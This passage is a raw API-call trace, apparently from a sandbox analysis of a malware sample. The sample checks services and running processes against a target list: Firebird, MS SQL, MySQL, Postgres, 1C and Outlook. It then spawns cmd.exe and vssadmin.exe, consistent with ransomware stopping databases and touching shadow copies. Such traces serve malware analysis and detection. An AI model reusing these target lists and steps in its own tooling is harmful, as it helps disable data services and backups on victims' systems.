[0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.539] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.539] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.539] lstrlenW (lpString="Themes") returned 6 [0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.539] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.539] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.539] lstrlenW (lpString="TrkWks") returned 6 [0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.539] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.539] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.539] lstrlenW (lpString="UxSms") returned 5 [0050.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.540] lstrlenW (lpString="VSS") returned 3 [0050.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.540] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.540] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.540] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.540] lstrlenW (lpString="Winmgmt") returned 7 [0050.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.540] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.540] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.541] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.541] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.541] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.541] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.541] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.541] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.541] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3800fb0 | out: hHeap=0x5f0000) returned 1 [0050.541] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a0 [0050.543] Process32FirstW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.544] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.545] lstrlenW (lpString="System") returned 6 [0050.545] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0050.545] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0050.545] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.545] lstrlenW (lpString="smss.exe") returned 8 [0050.545] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0050.545] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0050.545] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0050.545] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0050.545] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0050.546] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0050.546] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0050.546] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.546] lstrlenW (lpString="csrss.exe") returned 9 [0050.546] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0050.546] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0050.546] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0050.546] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0050.546] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0050.546] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0050.546] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0050.546] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.547] lstrlenW (lpString="wininit.exe") returned 11 [0050.547] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0050.547] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0050.547] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0050.547] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.548] lstrlenW (lpString="csrss.exe") returned 9 [0050.548] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.548] lstrlenW (lpString="winlogon.exe") returned 12 [0050.549] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.549] lstrlenW (lpString="services.exe") returned 12 [0050.549] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.550] lstrlenW (lpString="lsass.exe") returned 9 [0050.550] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0050.551] lstrlenW (lpString="lsm.exe") returned 7 [0050.551] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.551] lstrlenW (lpString="svchost.exe") returned 11 [0050.551] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.552] lstrlenW (lpString="svchost.exe") returned 11 [0050.552] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.553] lstrlenW (lpString="svchost.exe") returned 11 [0050.553] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.553] lstrlenW (lpString="svchost.exe") returned 11 [0050.553] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.554] lstrlenW (lpString="svchost.exe") returned 11 [0050.554] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.555] lstrlenW (lpString="audiodg.exe") returned 11 [0050.555] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.555] lstrlenW (lpString="svchost.exe") returned 11 [0050.555] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.556] lstrlenW (lpString="svchost.exe") returned 11 [0050.556] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.557] lstrlenW (lpString="dwm.exe") returned 7 [0050.557] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.557] lstrlenW (lpString="explorer.exe") returned 12 [0050.557] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.559] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.559] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.559] lstrlenW (lpString="taskhost.exe") returned 12 [0050.559] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.560] lstrlenW (lpString="svchost.exe") returned 11 [0050.560] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0050.561] lstrlenW (lpString="taskeng.exe") returned 11 [0050.561] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.561] lstrlenW (lpString="taskhost.exe") returned 12 [0050.561] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0050.562] lstrlenW (lpString="entrepreneur.exe") returned 16 [0050.562] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0050.563] lstrlenW (lpString="andrew kinds.exe") returned 16 [0050.563] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0050.563] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0050.563] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0050.564] lstrlenW (lpString="educated.exe") returned 12 [0050.564] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0050.565] lstrlenW (lpString="servers.exe") returned 11 [0050.565] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0050.565] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0050.565] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0050.566] lstrlenW (lpString="gbp_chair.exe") returned 13 [0050.566] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0050.567] lstrlenW (lpString="attention infected.exe") returned 22 [0050.567] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0050.567] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0050.567] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0050.568] lstrlenW (lpString="pattern amateur.exe") returned 19 [0050.568] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0051.181] lstrlenW (lpString="referral.exe") returned 12 [0051.181] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0051.182] lstrlenW (lpString="copyingseems.exe") returned 16 [0051.182] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0051.183] lstrlenW (lpString="spin generally.exe") returned 18 [0051.183] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0051.184] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0051.184] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0051.184] lstrlenW (lpString="transmit.exe") returned 12 [0051.184] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0051.185] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0051.185] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0051.186] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0051.186] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0051.187] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0051.187] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0051.187] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0051.187] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0051.188] lstrlenW (lpString="delight.exe") returned 11 [0051.188] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0051.189] lstrlenW (lpString="within enquiry.exe") returned 18 [0051.189] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.189] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0051.189] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0051.190] lstrlenW (lpString="agent1c.exe") returned 11 [0051.190] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.191] lstrlenW (lpString="cmd.exe") returned 7 [0051.191] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.191] lstrlenW (lpString="conhost.exe") returned 11 [0051.192] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0051.192] lstrlenW (lpString="vssadmin.exe") returned 12 [0051.192] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0051.193] lstrlenW (lpString="VSSVC.exe") returned 9 [0051.193] Process32NextW (in: hSnapshot=0x1a0, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, 